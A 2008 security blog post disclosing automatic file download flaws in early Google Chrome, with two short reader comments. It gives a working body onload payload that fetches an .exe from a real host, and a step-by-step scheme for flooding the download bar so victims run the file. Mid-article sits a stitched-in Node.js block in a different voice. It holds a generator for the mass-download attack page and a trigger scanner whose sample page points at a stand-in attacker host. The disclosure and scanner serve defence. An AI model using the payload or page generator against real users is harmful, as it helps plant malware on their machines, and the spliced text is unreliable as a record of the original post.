Automatic File Download vulnerabilities in browsers

22:48 13.09.2008

This is the English version of my article Automatic File Download vulnerabilities in browsers.

To the already known classes of browser vulnerabilities I am adding a new one. I present a new class of browser vulnerabilities, Automatic File Download: a new attack vector that can be used to spread malicious software.

I had met vulnerabilities before that led to the automatic downloading of arbitrary files from the Internet, exe files in particular, followed by their execution. Those were buffer overflow vulnerabilities in browsers, in Internet Explorer in particular. But this is the first time I have seen such a vulnerability that is part of the browser's own functionality. It was present in Google Chrome. Since I have not seen it in any other browser I have worked with, I state that Chrome is the first browser with a holed file download function (where the attack goes through the download function itself).

Variants of attack.

Of all the vulnerabilities I have found in Google Chrome, including during my project Day of bugs in Google Chrome, seven were Automatic File Download. Altogether eight such holes were disclosed: one by nerex and seven by me.

All these vulnerabilities are triggered automatically, while loading a page that contains the required code. I found 8 such cases in all: via the tags iframe, frame, meta, script, body, form, frameset and img. Other tags can be used for this attack as well, but they will not trigger automatically, because they require some action from the user (clicking an element, pointing at an element, etc.). So the 8 variants above are the most suitable ones for the attack.

All versions of Google Chrome are vulnerable to these holes (the latest at the time of writing, 0.2.149.29, and earlier versions of the browser).

Making the attack.

To carry out the attack, it is necessary to place the code on a web page and lure a user of the browser to it.

Example of the code for the vulnerability via the body tag:

<body onload="document.location='http://websecurity.com.ua/uploads/hack.exe'">

Algorithm of the attack:

1. The user comes to a web site that contains this code.

[Screenshot: Google Chrome-1]

2. The executable file (exe) is automatically downloaded to the user's computer, into the download folder set in the options.

[Screenshot: Google Chrome-2]

After that, the user can at any time go to his download folder and, while checking his files, run this program, which can be a malicious one.

3. To speed up the attack, the offender can prompt the victim to run this application from the browser.

For this, a mass download effect is needed: the automatic download of many exe files is started at once, and each of them appears as a button at the bottom of the browser's window. When many downloads run simultaneously, they fill the whole bottom of the browser's window, which makes it likely that the user will click on one of them.

[Screenshot: Google Chrome-3]

4. The user can move the cursor and click on one of these buttons. He may do it by clicking a button accidentally (especially when there are many of them), out of curiosity, or because he decided that he downloaded some file himself.

[Screenshot: Google Chrome-4]

5. After clicking it, the user immediately runs the just-downloaded program, which can compromise his computer. The picture shows my demonstration program, designed to remind people of the need to attend to security.

[Screenshot: Google Chrome-5]

As the last picture shows, even Google can't protect you from me 8-) .
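As an added example (my own code, not code from the article or from Google), the following Node.js script covers both sides of the procedure above: it builds the mass-download page from step 3 (one hidden iframe per executable URL) and implements the check a defender would want, a scanner that flags the eight auto-triggering tag variants the article lists (iframe, frame, meta, script, body, form, frameset, img) whenever they point at an executable without any user action. The article shows only the body variant, so the attribute checked for each tag, the extension list, the attacker.invalid host and the sample page are all my assumptions; a plain link is deliberately not flagged, because it needs a click.

```javascript
// Added example (not MustLive's code): generator for the "mass download" page
// and a scanner for the auto-triggering tag variants the article describes.
// Tag/attribute mapping, extension list and sample markup are assumptions.

// Extensions treated as executable. Assumption: the article only names exe.
const EXECUTABLE_EXT = /\.(exe|msi|scr|bat|cmd|pif)$/i;

// Attributes fetched as soon as the tag is parsed, with no user interaction.
const AUTO_LOAD_ATTRS = {
  iframe: ['src'],
  frame: ['src'],
  img: ['src'],
  script: ['src'],
  form: ['action'], // assumption: the page submits the form itself from script
};

// True when the URL path ends in an executable extension. Relative URLs are
// resolved against a dummy base; the query string is ignored on purpose.
function isExecutableUrl(url) {
  try {
    return EXECUTABLE_EXT.test(new URL(url, 'http://example.invalid/').pathname);
  } catch (e) {
    return false;
  }
}

// Minimal attribute parser for one tag (double-quoted, single-quoted or bare values).
function parseAttrs(attrText) {
  const attrs = {};
  const re = /([^\s=\/]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  for (const m of attrText.matchAll(re)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// URLs assigned to location (or passed to location.replace/assign) in inline
// JavaScript, e.g. the body onload payload shown in the article.
function extractNavigationTargets(js) {
  const assign = /\blocation(?:\.href)?\s*=\s*['"]([^'"]+)['"]/gi;
  const call = /\blocation\.(?:replace|assign)\s*\(\s*['"]([^'"]+)['"]/gi;
  return [...js.matchAll(assign), ...js.matchAll(call)].map((m) => m[1]);
}

// Scan a page and return one {tag, attr, url} record per automatic download trigger.
function findAutoDownloadTriggers(html) {
  const hits = [];
  // Limitation: a literal '>' inside an attribute value ends the tag early.
  const tagRe = /<([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  for (const m of html.matchAll(tagRe)) {
    const tag = m[1].toLowerCase();
    const attrs = parseAttrs(m[2]);
    const toCheck = Object.prototype.hasOwnProperty.call(AUTO_LOAD_ATTRS, tag) ? AUTO_LOAD_ATTRS[tag] : [];

    for (const attr of toCheck) {
      if (attrs[attr] !== undefined && isExecutableUrl(attrs[attr])) {
        hits.push({ tag, attr, url: attrs[attr] });
      }
    }
    // <meta http-equiv="refresh" content="0;url=..."> navigates on load.
    if (tag === 'meta' && /^refresh$/i.test(attrs['http-equiv'] || '')) {
      const mm = /url\s*=\s*['"]?([^'"\s;]+)/i.exec(attrs.content || '');
      if (mm && isExecutableUrl(mm[1])) hits.push({ tag, attr: 'content', url: mm[1] });
    }
    // body/frameset onload handlers run without any user action.
    if ((tag === 'body' || tag === 'frameset') && attrs.onload) {
      for (const url of extractNavigationTargets(attrs.onload)) {
        if (isExecutableUrl(url)) hits.push({ tag, attr: 'onload', url });
      }
    }
  }
  return hits;
}

// Step 3 of the article: start many downloads at once so the download shelf
// fills up with buttons. One hidden iframe per URL.
function buildMassDownloadPage(urls) {
  const esc = (s) => s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
  const frames = urls
    .map((u) => `<iframe src="${esc(u)}" width="0" height="0" style="display:none"></iframe>`)
    .join('\n');
  return `<html><body>\n${frames}\n</body></html>`;
}

// Constructed sample page: auto-triggering variants mixed with harmless tags
// (a png image and a link that needs a click).
const SAMPLE_PAGE = `<!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="0;url=http://attacker.invalid/files/hack.exe">
<script src="http://attacker.invalid/files/loader.exe"></script>
</head>
<body onload="document.location='http://attacker.invalid/files/hack.exe'">
<img src="http://attacker.invalid/logo.png">
<iframe src="http://attacker.invalid/files/setup.EXE?x=1"></iframe>
<form action="http://attacker.invalid/files/hack.exe" method="post"></form>
<a href="http://attacker.invalid/files/hack.exe">download</a>
</body>
</html>`;

console.log(findAutoDownloadTriggers(SAMPLE_PAGE));
```

Run with `node scan.js`; on the sample page it reports five triggers (meta, script, body, iframe, form) and leaves the image and the link alone. The scanner is a regex pass, not an HTML parser, so it is a triage aid for proxy or mail-gateway logs rather than a complete defence; the real fix is the one the conclusion asks for, a browser that does not save executables silently.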

Conclusion.

A hidden attack (for file downloading) can be made when the user has turned off the option "Ask me where to save every file". Considering that this option is off by default, and that even when it is on it can be turned off at any time (by the user, or by somebody "kind" who gets access to the user's browser), this vulnerability and the attacks based on it present a serious danger.

Of the browsers I have worked with, such functionality, where the option "do not ask where to save" can be set in the settings, exists in Firefox (since the first 0.x versions, one of which I downloaded in 2004). But in all versions of Firefox, before downloading a file the browser always asks whether you want to save this file (as other browsers do); the option only affects whether a second dialog appears asking where to save the file (i.e. there are two dialogs). Chrome, however, saves the file right away without asking.

It would be better for browser developers, Google in particular, not to allow such vulnerabilities in their applications.


2 responses to “Automatic File Download vulnerabilities in browsers”

  1. fdfg says:

    g :D

  2. MustLive says:

    Yes, it’s a nice hole :-) . But Google has already fixed it in Chrome 1.x.

    But already in 2008 I created a File Download attack (which I called the SaveAs attack), which could emulate the Automatic File Download attack. And it potentially works in all browsers.
